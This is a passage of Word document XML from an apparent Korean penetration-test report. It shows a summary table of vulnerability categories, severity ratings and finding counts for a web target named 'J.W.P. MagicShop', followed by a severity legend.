          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AC9EA98" w14:textId="1A5DCFB6" w:rsidR="00501A54" w:rsidRPr="00C7271D" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F2330C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t>J.W.P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F2330C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> MagicShop </w:t>
            </w:r>
            <w:r w:rsidRPr="00C7271D">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="006431E1">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t>http://43.203.87.232</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7271D">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F39AE13" w14:textId="507AF979" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B025C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>중요</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22D7D51D" w14:textId="514D458E" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00471CB8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>입력값 검증 미흡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D177494" w14:textId="301CB20B" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="0089262C" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501A54" w14:paraId="516DED23" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EB92231" w14:textId="3E3ABB8B" w:rsidR="00501A54" w:rsidRPr="00C7271D" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F615923" w14:textId="69DFF192" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B025C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>중요</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04A57B6B" w14:textId="6659AFAE" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00471CB8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>인증 및 접근통제 취약</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B7C7A55" w14:textId="65C16494" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00471CB8">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501A54" w14:paraId="713E797A" w14:textId="77777777" w:rsidTr="00423D38">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D7284E5" w14:textId="32FC506F" w:rsidR="00501A54" w:rsidRPr="00C7271D" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D610328" w14:textId="74CEF5BB" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B025C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>일반</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DC30331" w14:textId="5C875819" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>세션 관리 취약</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D5E2F05" w14:textId="405854EF" w:rsidR="00501A54" w:rsidRPr="00B12AEC" w:rsidRDefault="00922982" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B12AEC">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501A54" w14:paraId="17D4FBA4" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04C73309" w14:textId="77777777" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68FDA188" w14:textId="6AEBE757" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:color w:val="FFC000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B025C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>일반</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="652AC043" w14:textId="463EE06F" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>민감정보 보호 미흡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="341EACB9" w14:textId="05B022CC" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501A54" w14:paraId="6B5A0258" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60C69286" w14:textId="77777777" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CF0179D" w14:textId="473B6F9C" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B025C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>일반</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61C6C251" w14:textId="763AFB00" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>보안 설정 미흡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="211986ED" w14:textId="02C4A01F" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501A54" w14:paraId="2F5AD877" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7718D869" w14:textId="77777777" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F332A76" w14:textId="3BA2C9D7" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00471CB8">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>중요</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38F09D27" w14:textId="24988496" w:rsidR="00501A54" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00471CB8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>취약한 기능 구현</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01C9A20F" w14:textId="03E8D598" w:rsidR="00501A54" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A2059C">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501A54" w14:paraId="5B082641" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B2F1DDB" w14:textId="77777777" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6999361E" w14:textId="1BE3DC99" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
                <w:color w:val="FFC000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>기타</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5299" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35BE1BC1" w14:textId="080B9E27" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>기타 취약점</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="593B8272" w14:textId="7AF539D5" w:rsidR="00501A54" w:rsidRPr="003B025C" w:rsidRDefault="00501A54" w:rsidP="00501A54">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62B07975" w14:textId="6500F30A" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Toc206630346"/>
      <w:bookmarkStart w:id="238" w:name="_Toc206630484"/>
      <w:bookmarkStart w:id="239" w:name="_Toc209094670"/>
      <w:r>
        <w:t xml:space="preserve">[표] </w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve"> SEQ [</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText>표</w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:instrText xml:space="preserve">] \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대상별 취약점 요약</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="238"/>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w14:paraId="27306249" w14:textId="77777777" w:rsidR="008152AC" w:rsidRDefault="008152AC" w:rsidP="00386271">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="063749C3" w14:textId="77777777" w:rsidR="002F404C" w:rsidRPr="0016533F" w:rsidRDefault="00ED794E" w:rsidP="0016533F">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r w:rsidRPr="0016533F">
        <w:t xml:space="preserve">※ </w:t>
      </w:r>
      <w:r w:rsidR="002F404C" w:rsidRPr="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점심각도</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12157D02" w14:textId="77777777" w:rsidR="00ED794E" w:rsidRPr="0016533F" w:rsidRDefault="002F404C" w:rsidP="0016533F">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD774D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>중요</w:t>
      </w:r>
      <w:r w:rsidRPr="0016533F">
        <w:t xml:space="preserve"> : 시스템의 직접적인 접근 및 침입, DB 획득 등 서버 시스템 장악이 가능한 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D696DEC" w14:textId="77777777" w:rsidR="002F404C" w:rsidRPr="0016533F" w:rsidRDefault="002F404C" w:rsidP="0016533F">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r w:rsidRPr="0016533F">
        <w:t>일반 : 시스템 직접 접근은 되지 않으나 취약한 체크리스트 항목</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AAD96B" w14:textId="77777777" w:rsidR="002F404C" w:rsidRPr="0016533F" w:rsidRDefault="002F404C" w:rsidP="0016533F">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r w:rsidRPr="0016533F">
        <w:t>기타 : 그 외의 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256399D1" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910A663" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="00802A7F" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="Level1TitleCtl1"/>
        <w:wordWrap/>
        <w:ind w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="_Toc206601963"/>
      <w:bookmarkStart w:id="241" w:name="_Toc209094552"/>
      <w:r>
